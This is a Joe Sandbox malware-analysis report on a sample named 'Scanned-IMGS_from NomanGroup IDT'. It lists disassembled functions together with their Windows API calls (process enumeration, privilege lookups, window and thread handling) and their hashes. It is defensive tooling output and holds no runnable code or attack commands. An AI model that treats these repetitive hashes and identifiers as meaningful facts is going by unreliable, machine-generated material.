                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 00a5c1e5fc5110974ae8ebe3171db7b233985a4e499e35c1c7496475ed067437
                                                                                • Instruction ID: f093c4be3d833c80f355f368b3b02eec9ab300919d6fc813fcee77381ca7a653
                                                                                • Opcode Fuzzy Hash: 00a5c1e5fc5110974ae8ebe3171db7b233985a4e499e35c1c7496475ed067437
                                                                                • Instruction Fuzzy Hash: C5313075D00249AFC700EFAAC8C1CAEB7F9EF48308B5080AEE415E7252D7359E45CBA4
                                                                                Function 004BD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004BD501
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004BD50F
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004BD52F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004BD5DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 420147892-0
                                                                                • Opcode ID: 1239b0787b76d3c439192ef949c1f08a98387241ff06ec2e8097c83a878ba507
                                                                                • Instruction ID: 93f92e1ae2a9eb982ea55e643881c02f52753d6682b951475fd64041aac6e0cd
                                                                                • Opcode Fuzzy Hash: 1239b0787b76d3c439192ef949c1f08a98387241ff06ec2e8097c83a878ba507
                                                                                • Instruction Fuzzy Hash: 3F31DB71108340AFD310EF54C881AAFBBF8EF95344F14096EF981871A2EB759949CBA7
                                                                                Function 004E8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • GetCursorPos.USER32(?), ref: 004E9001
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004A7711,?,?,?,?,?), ref: 004E9016
                                                                                • GetCursorPos.USER32(?), ref: 004E905E
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004A7711,?,?,?), ref: 004E9094
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 321a0618f43dc896e73cc8b3d625f2994805418aaf60174f94e314ccb26e766f
                                                                                • Instruction ID: e18bf523a6b58cfba39c1f37bd6a1aa66f4e46de80e70e305ca68edfa3f0b32f
                                                                                • Opcode Fuzzy Hash: 321a0618f43dc896e73cc8b3d625f2994805418aaf60174f94e314ccb26e766f
                                                                                • Instruction Fuzzy Hash: F921B171600158FFCB258F96C898EEB3BB9FF4A351F44406AF5054B2A1C3359E91DB64
                                                                                Function 004BD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,004ECB68), ref: 004BD2FB
                                                                                • GetLastError.KERNEL32 ref: 004BD30A
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004BD319
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004ECB68), ref: 004BD376
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 2267087916-0
                                                                                • Opcode ID: 1226d4351b34626a0417617acca6c2100405d21f7a307a9d5b13df89fc1a8fda
                                                                                • Instruction ID: bc13bf1c82db40769c099e1086c7131a6c7f66aeaf6cf13a93a22d9ff15a1035
                                                                                • Opcode Fuzzy Hash: 1226d4351b34626a0417617acca6c2100405d21f7a307a9d5b13df89fc1a8fda
                                                                                • Instruction Fuzzy Hash: 432182709042019F8700DF25C8814AB77E4AF55359F105A5EF895C72A3E739994ACBAB
                                                                                Function 004B1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B102A
                                                                                  • Part of subcall function 004B1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B1036
                                                                                  • Part of subcall function 004B1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1045
                                                                                  • Part of subcall function 004B1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B104C
                                                                                  • Part of subcall function 004B1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1062
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004B15BE
                                                                                • _memcmp.LIBVCRUNTIME ref: 004B15E1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B1617
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B161E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                • String ID:
                                                                                • API String ID: 1592001646-0
                                                                                • Opcode ID: 32eecaadf14215df19102c0ed1dfbb261641bf60d1780ffd9a0777536df2fc90
                                                                                • Instruction ID: 2bf09c66886cda5952258cb190e163d447c5bce1d63a72f8daf649dc5ab1107d
                                                                                • Opcode Fuzzy Hash: 32eecaadf14215df19102c0ed1dfbb261641bf60d1780ffd9a0777536df2fc90
                                                                                • Instruction Fuzzy Hash: 4021AF31E40108EFDF10DFA4C995BEFB7B8EF45344F48445AE441AB261E738AA15CBA4
                                                                                Function 004E2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004E280A
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E2824
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E2832
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004E2840
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: 080e693e1c80764d6f2c00212819a83498bf35ef35726613cba74f9da0dad628
                                                                                • Instruction ID: 59cfdebf3af08a6248b45ab045d5e73b82cd81f6bb9da0c23319769485bf1d58
                                                                                • Opcode Fuzzy Hash: 080e693e1c80764d6f2c00212819a83498bf35ef35726613cba74f9da0dad628
                                                                                • Instruction Fuzzy Hash: E9210231204190AFD7149B26C981F6A7799BF45329F14821EF8168B2D2C7B9EC42C798
                                                                                Function 004B78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?), ref: 004B8D8C
                                                                                  • Part of subcall function 004B8D7D: lstrcpyW.KERNEL32(00000000,?,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B8DB2
                                                                                  • Part of subcall function 004B8D7D: lstrcmpiW.KERNEL32(00000000,?,004B790A,?,000000FF,?,004B8754,00000000,?,0000001C,?,?), ref: 004B8DE3
                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7923
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7949
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,004B8754,00000000,?,0000001C,?,?,00000000), ref: 004B7984
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 17d359aeacdb3edabe4cbcb788363e7727ef1b01f91fea53fb1d3e03a6b6f24e
                                                                                • Instruction ID: a1cea070d120d29135133ffd011a5952d4b8ec257edfd5ae9b5b557048d0e12d
                                                                                • Opcode Fuzzy Hash: 17d359aeacdb3edabe4cbcb788363e7727ef1b01f91fea53fb1d3e03a6b6f24e
                                                                                • Instruction Fuzzy Hash: 5611037A200242ABDB159F35D884DBB77A9FF85354B00402FF842CB3A5EB359812C7A9
                                                                                Function 004E7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E7D0B
                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 004E7D2A
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004E7D42
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004CB7AD,00000000), ref: 004E7D6B
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID:
                                                                                • API String ID: 847901565-0
                                                                                • Opcode ID: d5091671c71d20b66ebd5defcf4f447c423ef3408a23878de1d561d72c846b03
                                                                                • Instruction ID: cc4f4b426c77fdf6e4a2c8374397f8e9c5642f206487057dd91f548b5ff6cef5
                                                                                • Opcode Fuzzy Hash: d5091671c71d20b66ebd5defcf4f447c423ef3408a23878de1d561d72c846b03
                                                                                • Instruction Fuzzy Hash: 0011AC312046A4AFCB108F29CC44EB73BA8AF46371B254725F839CB2E0E7349D52DB48
                                                                                Function 004E5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 004E56BB
                                                                                • _wcslen.LIBCMT ref: 004E56CD
                                                                                • _wcslen.LIBCMT ref: 004E56D8
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004E5816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend_wcslen
                                                                                • String ID:
                                                                                • API String ID: 455545452-0
                                                                                • Opcode ID: 320473dc93ead814340276fb20d7edbfa693ee7977cfbf72c7c457bd25007911
                                                                                • Instruction ID: a78b98e8cca47664997c1eaeaa9f279dd8106963448078d3fedc0c8c4769bae7
                                                                                • Opcode Fuzzy Hash: 320473dc93ead814340276fb20d7edbfa693ee7977cfbf72c7c457bd25007911
                                                                                • Instruction Fuzzy Hash: BB11E47160068996DB20DF738CC1AEF376CEF1136AF10402BF909D6182E7788981CB69
                                                                                Function 00481D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0fc298c8f3c5b7a32ce733825582c520323c6e8b75342094167b6f66a6bcf344
                                                                                • Instruction ID: cf20ed82b7cc58e3cdabcf21f8628a518aa8b44bd59a7b96e22988f4d951ce20
                                                                                • Opcode Fuzzy Hash: 0fc298c8f3c5b7a32ce733825582c520323c6e8b75342094167b6f66a6bcf344
                                                                                • Instruction Fuzzy Hash: 2301A7F22056167EF61136796CC0F2F669CDF413B8B310F2BF521512E2DB68AC025368
                                                                                Function 004B1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004B1A47
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A59
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A6F
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004B1A8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 1851b105f1d5ae9eed09751e993ad4dc273d901bac0b452b99db3a141348027f
                                                                                • Instruction ID: 4b8717ae50172eea31565bd144b120316c02bf9c87f22a5d259deaaf300c73ca
                                                                                • Opcode Fuzzy Hash: 1851b105f1d5ae9eed09751e993ad4dc273d901bac0b452b99db3a141348027f
                                                                                • Instruction Fuzzy Hash: A3112E35901219FFDB109BA5C985FDDBB78EB08750F200092E500B7290D6716E51DB94
                                                                                Function 004BE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004BE1FD
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004BE230
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004BE246
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004BE24D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: bd7381f89b6b44161dc8d9a742a2e4f7897e2c454c98ecc519d1e0e1f546fc27
                                                                                • Instruction ID: 97ed85c0328d63fa6665508a56f7fda75f4418c74159818cec675aaf62d1993a
                                                                                • Opcode Fuzzy Hash: bd7381f89b6b44161dc8d9a742a2e4f7897e2c454c98ecc519d1e0e1f546fc27
                                                                                • Instruction Fuzzy Hash: 91114872D04244BFC710DBA89C85ADF7FAD9F91310F10466AF825E3281C274CD0587B8
                                                                                Function 0047D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,?,0047CFF9,00000000,00000004,00000000), ref: 0047D218
                                                                                • GetLastError.KERNEL32 ref: 0047D224
                                                                                • __dosmaperr.LIBCMT ref: 0047D22B
                                                                                • ResumeThread.KERNEL32(00000000), ref: 0047D249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 173952441-0
                                                                                • Opcode ID: 569851549bc1e13561f97ec24ada887cc60aa593136bb05be1d79a1869c72188
                                                                                • Instruction ID: ee5298803dec51fd23bf9caa63b40e46c81c402a1c0cd74933a10c39bc6f38bf
                                                                                • Opcode Fuzzy Hash: 569851549bc1e13561f97ec24ada887cc60aa593136bb05be1d79a1869c72188
                                                                                • Instruction Fuzzy Hash: 86010436C142047BC7105BA6DC45BEB7A78DF81334F20826AF828961D2CB75890286A9
                                                                                Function 0045600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
                                                                                • GetStockObject.GDI32(00000011), ref: 00456060
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: 9f8eea33ecfb911185c22eb3281dd1ea5984e9edd02daf0aa2ec20e9e025132c
                                                                                • Instruction ID: 360131ae62e2d063fb6da4a791987e65d0f33279270cfab42ce3222070c1cf5b
                                                                                • Opcode Fuzzy Hash: 9f8eea33ecfb911185c22eb3281dd1ea5984e9edd02daf0aa2ec20e9e025132c
                                                                                • Instruction Fuzzy Hash: B711E172101548BFEF128FA4CC84EEBBB69EF08765F010212FE0446151C7369C61DBA4
                                                                                Function 00473B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00473B56
                                                                                  • Part of subcall function 00473AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00473AD2
                                                                                  • Part of subcall function 00473AA3: ___AdjustPointer.LIBCMT ref: 00473AED
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00473B6B
                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00473B7C
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00473BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                • String ID:
                                                                                • API String ID: 737400349-0
                                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                • Instruction ID: e0574aa8a036dac22fde9080fcec40b867265ff2d6fa46750e12262661ebdf6e
